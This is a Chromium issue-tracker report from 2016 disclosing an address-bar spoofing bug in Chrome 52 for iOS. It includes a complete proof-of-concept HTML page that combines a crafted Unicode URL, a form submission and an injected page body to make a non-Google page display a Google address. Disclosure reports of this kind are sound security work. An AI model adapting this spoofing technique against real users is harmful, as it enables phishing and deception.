Issue metadata
Sign in to add a comment
|
Address Bar Spoofing in Chrome 52.0.2743.84 iOS
Reported by
martinzh...@gmail.com,
Aug 17 2016
|
||||||||||||||||||||||||
Issue description
Steps to reproduce the problem:
1. Open the PoC page(spoof.html):
http://115.159.58.203/spoof/index.html
<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
</head>
<body>
<form action="http://115.159.58.203/%EF%B9%B0/https://www.google.com/m" target="aa" method="post" onsubmit="setTimeout('p()',1000);">
<input type="submit">
</form>
<script>
function p() {
var t = window.open('','aa');
t.document.body.innerHTML = '<h1 style="color:blue;">Fake Mozila Homepage!</h1>';
t.stop();
}
</script>
</body>
</html>
2. Click "Submit", spoofed pages shown.
What is the expected behavior?
What went wrong?
The URL "http://115.159.58.203/%EF%B9%B0/https://www.google.com/m" will be displayed in Chrome iOS version's address bar like "https://www.google.com/m/"/115.159.58.203", so that the attacker could spoof the google's homepage in the Chrome iOS version.
Did this work before? N/A
Chrome version: 52.0.2743.84 Channel: stable
OS Version: Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_3 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko)
Flash Version: Shockwave Flash 22.0 r0
,
Aug 17 2016
,
Nov 24 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||||||
Comment 1 by jialiul@chromium.org
, Aug 17 2016Components: UI>Browser>Omnibox
Owner: justincohen@chromium.org